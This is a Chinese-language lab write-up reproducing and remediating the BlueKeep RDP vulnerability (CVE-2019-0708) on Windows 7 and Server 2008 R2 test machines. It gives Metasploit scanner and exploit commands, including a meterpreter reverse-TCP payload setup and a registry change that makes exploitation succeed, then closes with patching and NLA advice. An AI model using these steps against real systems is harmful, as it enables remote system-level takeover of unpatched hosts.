CVE-2019-0708漏洞复现与修复

 · 2019-9-8 · 次阅读


实验环境:
Kali:192.168.73.131
Win7sp1:192.168.73.130
Win2008R2sp1:192.168.73.136
先上波图

image

挖洞千万条,安全第一条,挖洞不规范,家人泪两行

0x01 漏洞原理及描述

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广如:windows2003、windows2008、windows2008 R2、windows xp系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用,会导致服务器入侵,中病毒,像WannaCry 永恒之蓝漏洞一样大规模的感染。2019年9月7日晚上凌晨1点左右,metaspolit更新了漏洞利用程序

在2019年5月,微软发布了针对远程代码执行漏洞CVE-2019-0708的补丁更新,该漏洞也称为“BlueKeep”,漏洞存在于远程桌面服务(RDS)的代码中。此漏洞是预身份验证,无需用户交互,因此具有潜在武器化蠕虫性性漏洞利用的危险。如果成功利用此漏洞,则可以使用“系统”权限执行任意代码。Microsoft安全响应中心的建议表明这个漏洞也可能会成为一种蠕虫攻击行为,类似于Wannacry和EsteemAudit等攻击行为。由于此漏洞的严重性及其对用户的潜在影响,微软采取了罕见的预警步骤,为不再受支持的Windows XP操作系统发布补丁,以保护Windows用户。

0x02 漏洞影响

该漏洞影响旧版本的Windows系统,包括:
Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP。
Windows 8和Windows 10及之后版本不受此漏洞影响。

0x03 前期准备

Tips:这次主要用msf集成的poc和exp进行漏洞利用

# 初始化msf
$ service postgresql start
$ msfdb init 
$ msfconsole

查询可利用模块

$ search cve-2019-0708

image

win7为例扫描一下

$ use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
$ show options
$ set RHOST ip
$ exp/run 

image

返回内容

[+] 192.168.73.130:3389   - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.73.130:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

0x04 漏洞利用

# 加载利用模块
$ use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

# 加载监听反弹payload模块
$ set payload windows/x64/meterpreter/reverse_tcp

# 配置本机监听地址
$ set LHOST local ip

# 配置远程目标主机地址
$ set RDP_CLIENT_IP ip
$ set RHOSTS ip

# 设置target即设置目标类型,提高成功率
$ set target 6

image

查看配置

image

攻击

image

成功返回meterpreter
截图桌面screenshot
提权过程可参考ms17-010

image
image

win2008r2sp1为例
Tips:经测试2008r2 Enterprise为例需要更改注册表
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdp-tcp\fDisableCam]值修改为0(系统默认为1)

image

0x05 漏洞修复与防御

windows桌面版本可以通过杀毒工具等渠道进行升级安装补丁包。
windows server等服务器系统可以访问官方下载补丁包下载。

防御方法可以设置远程连接为“仅允许允许使用网络级别身份验证的远程桌面的计算机连接”或不允许连接到此计算机